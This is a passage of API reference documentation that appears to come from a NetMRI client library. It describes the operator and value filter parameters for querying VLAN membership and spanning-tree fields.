:type val_c_BaseBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BaseNumPorts: The operator to apply to the field BaseNumPorts. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BaseNumPorts: The number of ports on this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BaseNumPorts: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BaseNumPorts: If op_BaseNumPorts is specified, the field named in this input will be compared to the value in BaseNumPorts using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BaseNumPorts must be specified if op_BaseNumPorts is specified.
:type val_f_BaseNumPorts: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BaseNumPorts: If op_BaseNumPorts is specified, this value will be compared to the value in BaseNumPorts using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BaseNumPorts must be specified if op_BaseNumPorts is specified.
:type val_c_BaseNumPorts: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BridgeMemberInd: The operator to apply to the field BridgeMemberInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BridgeMemberInd: A flag indicating that this VLAN membership record represents a bridge device's configuration entry for the VLAN; that is, that this membership record is for a bridge participating in the VLAN, as opposed to a device attached to an access port. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BridgeMemberInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BridgeMemberInd: If op_BridgeMemberInd is specified, the field named in this input will be compared to the value in BridgeMemberInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BridgeMemberInd must be specified if op_BridgeMemberInd is specified.
:type val_f_BridgeMemberInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BridgeMemberInd: If op_BridgeMemberInd is specified, this value will be compared to the value in BridgeMemberInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BridgeMemberInd must be specified if op_BridgeMemberInd is specified.
:type val_c_BridgeMemberInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InterfaceID: The operator to apply to the field InterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InterfaceID: The internal NetMRI identifier for the switched virtual interface for this VLAN on this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InterfaceID: If op_InterfaceID is specified, the field named in this input will be compared to the value in InterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InterfaceID must be specified if op_InterfaceID is specified.
:type val_f_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InterfaceID: If op_InterfaceID is specified, this value will be compared to the value in InterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InterfaceID must be specified if op_InterfaceID is specified.
:type val_c_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RootBridgeAddress: The operator to apply to the field RootBridgeAddress. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RootBridgeAddress: The spanning tree protocol root bridge address; this is the designated root with the STP priority portion removed. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RootBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RootBridgeAddress: If op_RootBridgeAddress is specified, the field named in this input will be compared to the value in RootBridgeAddress using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RootBridgeAddress must be specified if op_RootBridgeAddress is specified.
:type val_f_RootBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RootBridgeAddress: If op_RootBridgeAddress is specified, this value will be compared to the value in RootBridgeAddress using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RootBridgeAddress must be specified if op_RootBridgeAddress is specified.
:type val_c_RootBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpBridgeForwardDelay: The operator to apply to the field StpBridgeForwardDelay. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpBridgeForwardDelay: The value that all bridges use for ForwardDelay when this bridge is acting as the root. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpBridgeForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpBridgeForwardDelay: If op_StpBridgeForwardDelay is specified, the field named in this input will be compared to the value in StpBridgeForwardDelay using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpBridgeForwardDelay must be specified if op_StpBridgeForwardDelay is specified.
:type val_f_StpBridgeForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpBridgeForwardDelay: If op_StpBridgeForwardDelay is specified, this value will be compared to the value in StpBridgeForwardDelay using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpBridgeForwardDelay must be specified if op_StpBridgeForwardDelay is specified.
:type val_c_StpBridgeForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpBridgeHelloTime: The operator to apply to the field StpBridgeHelloTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpBridgeHelloTime: The value that all bridges use for HelloTime when this bridge is acting as the root. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpBridgeHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpBridgeHelloTime: If op_StpBridgeHelloTime is specified, the field named in this input will be compared to the value in StpBridgeHelloTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpBridgeHelloTime must be specified if op_StpBridgeHelloTime is specified.
:type val_f_StpBridgeHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpBridgeHelloTime: If op_StpBridgeHelloTime is specified, this value will be compared to the value in StpBridgeHelloTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpBridgeHelloTime must be specified if op_StpBridgeHelloTime is specified.
:type val_c_StpBridgeHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpBridgeMaxAge: The operator to apply to the field StpBridgeMaxAge. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpBridgeMaxAge: The value that all bridges use for MaxAge when this bridge is acting as the root. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpBridgeMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpBridgeMaxAge: If op_StpBridgeMaxAge is specified, the field named in this input will be compared to the value in StpBridgeMaxAge using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpBridgeMaxAge must be specified if op_StpBridgeMaxAge is specified.
:type val_f_StpBridgeMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpBridgeMaxAge: If op_StpBridgeMaxAge is specified, this value will be compared to the value in StpBridgeMaxAge using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpBridgeMaxAge must be specified if op_StpBridgeMaxAge is specified.
:type val_c_StpBridgeMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpDesignatedRoot: The operator to apply to the field StpDesignatedRoot. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpDesignatedRoot: The bridge identifier for this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpDesignatedRoot: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpDesignatedRoot: If op_StpDesignatedRoot is specified, the field named in this input will be compared to the value in StpDesignatedRoot using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpDesignatedRoot must be specified if op_StpDesignatedRoot is specified.
:type val_f_StpDesignatedRoot: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpDesignatedRoot: If op_StpDesignatedRoot is specified, this value will be compared to the value in StpDesignatedRoot using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpDesignatedRoot must be specified if op_StpDesignatedRoot is specified.
:type val_c_StpDesignatedRoot: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpForwardDelay: The operator to apply to the field StpForwardDelay. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpForwardDelay: This time value, measured in units of hundredths of a second, controls how fast a port changes its spanning state when moving towards the Forwarding state. The value determines how long the port stays in each of the Listening and Learning states, which precede the Forwarding state. This value is also used when a topology change has been detected and is underway, to age all dynamic entries in the Forwarding Database. This is the value currently in use on this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpForwardDelay: If op_StpForwardDelay is specified, the field named in this input will be compared to the value in StpForwardDelay using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpForwardDelay must be specified if op_StpForwardDelay is specified.
:type val_f_StpForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpForwardDelay: If op_StpForwardDelay is specified, this value will be compared to the value in StpForwardDelay using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpForwardDelay must be specified if op_StpForwardDelay is specified.
:type val_c_StpForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpHelloTime: The operator to apply to the field StpHelloTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpHelloTime: The amount of time between the transmission of Configuration bridge PDUs by this node on any port when it is the root of the spanning tree, or trying to become so, in units of hundredths of a second. This is the actual value that this bridge is currently using. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpHelloTime: If op_StpHelloTime is specified, the field named in this input will be compared to the value in StpHelloTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpHelloTime must be specified if op_StpHelloTime is specified.
:type val_f_StpHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpHelloTime: If op_StpHelloTime is specified, this value will be compared to the value in StpHelloTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpHelloTime must be specified if op_StpHelloTime is specified.
:type val_c_StpHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpHoldTime: The operator to apply to the field StpHoldTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpHoldTime: This time value determines the interval length during which no more than two Configuration bridge PDUs shall be transmitted by this node, in units of hundredths of a second. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpHoldTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpHoldTime: If op_StpHoldTime is specified, the field named in this input will be compared to the value in StpHoldTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpHoldTime must be specified if op_StpHoldTime is specified.
:type val_f_StpHoldTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpHoldTime: If op_StpHoldTime is specified, this value will be compared to the value in StpHoldTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpHoldTime must be specified if op_StpHoldTime is specified.
:type val_c_StpHoldTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpMaxAge: The operator to apply to the field StpMaxAge. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpMaxAge: The maximum age of Spanning Tree Protocol information learned from the network on any port before it is discarded, in units of hundredths of a second. This is the actual value that this bridge is currently using. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpMaxAge: If op_StpMaxAge is specified, the field named in this input will be compared to the value in StpMaxAge using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpMaxAge must be specified if op_StpMaxAge is specified.
:type val_f_StpMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpMaxAge: If op_StpMaxAge is specified, this value will be compared to the value in StpMaxAge using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpMaxAge must be specified if op_StpMaxAge is specified.
:type val_c_StpMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpPriority: The operator to apply to the field StpPriority. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpPriority: The spanning tree protocol priority for this bridge in this VLAN. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpPriority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpPriority: If op_StpPriority is specified, the field named in this input will be compared to the value in StpPriority using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpPriority must be specified if op_StpPriority is specified.
:type val_f_StpPriority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpPriority: If op_StpPriority is specified, this value will be compared to the value in StpPriority using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpPriority must be specified if op_StpPriority is specified.
:type val_c_StpPriority: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpProtocolSpecification: The operator to apply to the field StpProtocolSpecification. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpProtocolSpecification: The protocol of spanning tree running for this VLAN. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpProtocolSpecification: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpProtocolSpecification: If op_StpProtocolSpecification is specified, the field named in this input will be compared to the value in StpProtocolSpecification using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpProtocolSpecification must be specified if op_StpProtocolSpecification is specified.
:type val_f_StpProtocolSpecification: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpProtocolSpecification: If op_StpProtocolSpecification is specified, this value will be compared to the value in StpProtocolSpecification using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpProtocolSpecification must be specified if op_StpProtocolSpecification is specified.
:type val_c_StpProtocolSpecification: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpRootCost: The operator to apply to the field StpRootCost. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpRootCost: The cost of the path to the root bridge as seen from this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpRootCost: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpRootCost: If op_StpRootCost is specified, the field named in this input will be compared to the value in StpRootCost using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpRootCost must be specified if op_StpRootCost is specified.
:type val_f_StpRootCost: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpRootCost: If op_StpRootCost is specified, this value will be compared to the value in StpRootCost using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpRootCost must be specified if op_StpRootCost is specified.
:type val_c_StpRootCost: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpRootPort: The operator to apply to the field StpRootPort. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpRootPort: The port number (i.e., the SwitchPortNumber attribute value of the interface) of the port that offers the lowest cost path from this bridge to the root bridge. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpRootPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpRootPort: If op_StpRootPort is specified, the field named in this input will be compared to the value in StpRootPort using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpRootPort must be specified if op_StpRootPort is specified.
:type val_f_StpRootPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpRootPort: If op_StpRootPort is specified, this value will be compared to the value in StpRootPort using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpRootPort must be specified if op_StpRootPort is specified.
:type val_c_StpRootPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpTopChanges: The operator to apply to the field StpTopChanges. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpTopChanges: The total number of topology changes detected by this bridge since the last reset. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpTopChanges: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpTopChanges: If op_StpTopChanges is specified, the field named in this input will be compared to the value in StpTopChanges using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpTopChanges must be specified if op_StpTopChanges is specified.
:type val_f_StpTopChanges: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpTopChanges: If op_StpTopChanges is specified, this value will be compared to the value in StpTopChanges using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpTopChanges must be specified if op_StpTopChanges is specified.
:type val_c_StpTopChanges: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VTPDomain: The operator to apply to the field VTPDomain. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VTPDomain: Management domain name if VLAN is VTP managed. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VTPDomain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VTPDomain: If op_VTPDomain is specified, the field named in this input will be compared to the value in VTPDomain using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VTPDomain must be specified if op_VTPDomain is specified.
:type val_f_VTPDomain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VTPDomain: If op_VTPDomain is specified, this value will be compared to the value in VTPDomain using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VTPDomain must be specified if op_VTPDomain is specified.
:type val_c_VTPDomain: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanID: The operator to apply to the field VlanID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanID: If op_VlanID is specified, the field named in this input will be compared to the value in VlanID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanID must be specified if op_VlanID is specified.
:type val_f_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanID: If op_VlanID is specified, this value will be compared to the value in VlanID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanID must be specified if op_VlanID is specified.
:type val_c_VlanID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberChangedCols: The operator to apply to the field VlanMemberChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberChangedCols: If op_VlanMemberChangedCols is specified, the field named in this input will be compared to the value in VlanMemberChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberChangedCols must be specified if op_VlanMemberChangedCols is specified.
:type val_f_VlanMemberChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberChangedCols: If op_VlanMemberChangedCols is specified, this value will be compared to the value in VlanMemberChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberChangedCols must be specified if op_VlanMemberChangedCols is specified.
:type val_c_VlanMemberChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberEndTime: The operator to apply to the field VlanMemberEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberEndTime: The ending effective time of this revision of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberEndTime: If op_VlanMemberEndTime is specified, the field named in this input will be compared to the value in VlanMemberEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberEndTime must be specified if op_VlanMemberEndTime is specified.
:type val_f_VlanMemberEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberEndTime: If op_VlanMemberEndTime is specified, this value will be compared to the value in VlanMemberEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberEndTime must be specified if op_VlanMemberEndTime is specified.
:type val_c_VlanMemberEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberID: The operator to apply to the field VlanMemberID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberID: The internal NetMRI identifier for this VLAN membership. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberID: If op_VlanMemberID is specified, the field named in this input will be compared to the value in VlanMemberID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberID must be specified if op_VlanMemberID is specified.
:type val_f_VlanMemberID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberID: If op_VlanMemberID is specified, this value will be compared to the value in VlanMemberID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberID must be specified if op_VlanMemberID is specified.
:type val_c_VlanMemberID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberStartTime: The operator to apply to the field VlanMemberStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberStartTime: The starting effective time of this revision of the record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberStartTime: If op_VlanMemberStartTime is specified, the field named in this input will be compared to the value in VlanMemberStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberStartTime must be specified if op_VlanMemberStartTime is specified.
:type val_f_VlanMemberStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberStartTime: If op_VlanMemberStartTime is specified, this value will be compared to the value in VlanMemberStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberStartTime must be specified if op_VlanMemberStartTime is specified.
:type val_c_VlanMemberStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanMemberTimestamp: The operator to apply to the field VlanMemberTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanMemberTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanMemberTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanMemberTimestamp: If op_VlanMemberTimestamp is specified, the field named in this input will be compared to the value in VlanMemberTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanMemberTimestamp must be specified if op_VlanMemberTimestamp is specified.
:type val_f_VlanMemberTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VlanMemberTimestamp: If op_VlanMemberTimestamp is specified, this value will be compared to the value in VlanMemberTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VlanMemberTimestamp must be specified if op_VlanMemberTimestamp is specified.
:type val_c_VlanMemberTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VlanName: The operator to apply to the field VlanName. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VlanName: The name of this VLAN as configured on this device. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VlanName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VlanName: If op_VlanName is specified, the field named in this input will be compared to the value in VlanName using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VlanName must be specified if op_VlanName is specified.
:type val_f_VlanName: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
